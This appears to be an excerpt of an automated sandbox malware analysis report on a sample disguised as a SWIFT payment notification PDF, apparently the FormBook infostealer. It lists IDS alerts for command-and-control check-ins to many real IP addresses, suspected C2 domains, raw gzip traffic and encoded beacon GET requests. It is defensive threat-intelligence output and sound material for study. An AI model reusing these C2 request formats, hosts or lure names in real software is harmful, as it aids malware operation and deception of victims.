                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 108.179.252.152:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49788 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49743 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49727 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49784 -> 47.52.221.8:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49796 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49731 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 108.179.252.152:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49739 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 154.38.64.6:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49792 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49751 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49808 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49812 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 108.179.252.152:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49804 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 173.255.194.134:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49800 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49732 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49728 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49730 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49734 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49729 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 208.91.197.27:80
                Source: DNS query: www.makerpay.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:27 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:33:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:33:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:34:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$
                Source: global trafficHTTP traffic detected: GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1Host: www.zz83x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1Host: www.qiusuo.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1Host: www.pg874.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1Host: www.rimberiokitchen.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
